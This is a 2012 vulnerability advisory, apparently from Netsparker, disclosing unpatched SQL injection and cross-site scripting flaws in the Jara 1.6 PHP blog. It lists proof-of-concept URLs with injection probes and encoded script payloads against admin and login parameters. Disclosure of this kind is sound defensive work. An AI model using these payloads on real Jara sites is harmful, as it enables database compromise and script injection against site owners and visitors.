Information -------------------- Name : XSS and SQL Injection Vulnerabilities in Jara Software : Jara 1.6 and possibly below. Vendor Homepage : http://sourceforge.net/projects/jara/ Vulnerability Type : Cross-Site Scripting and SQL Injection Severity : Critical Researcher : Canberk Bolat Advisory Reference : NS-12-009 Description -------------------- An open source simple blog utilising the features of PHP 5 and MySQL 5. Supports multiple writers, categories, managing posts, static content pages and post comments as well as providing an intuitive administration panel. Details -------------------- Jara is affected by XSS and SQL Injection vulnerabilities in version 1.6. Example PoC urls are as follows : SQL Injection Vulnerabilities http://example.com/login.php (POST - username) http://example.com/login.php (POST - password) http://example.com/admin/delete_page.php?id='%2BNSFTW%2B' http://example.com/admin/delete_post.php?id='%2BNSFTW%2B' http://example.com/admin/delete_category.php?id='%2BNSFTW%2B' http://example.com/admin/delete_user.php?id='%2BNSFTW%2B' http://example.com/admin/edit_page.php?id='%2BNSFTW%2B' http://example.com/admin/edit_user.php?id='%2BNSFTW%2B' http://example.com/admin/edit_post.php (POST - id) http://example.com/admin/edit_category.php (POST - id) XSS Vulnerabilities http://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E http://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E http://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E http://example.com/login.php (POST - username) http://example.com/login.php (POST - password) http://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E http://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E http://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E http://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E http://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E http://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E http://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E You can read the full article about Cross-Site Scripting and SQL Injection vulnerabilities from here : Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/ SQL Injection: http://www.mavitunasecurity.com/sql-injection/ Solution -------------------- No patch released. Advisory Timeline -------------------- 19/11/2011 - Couldn’t found a contact e-mail 22/08/2012 - Vulnerability Released Credits -------------------- It has been discovered on testing of Netsparker, Web Application Security Scanner - http://www.mavitunasecurity.com/netsparker/. References -------------------- MSL Advisory Link : http://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-jara/ Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/ About Netsparker -------------------- Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner. -- Netsparker Advisories, Homepage, http://www.mavitunasecurity.com/netsparker-advisories/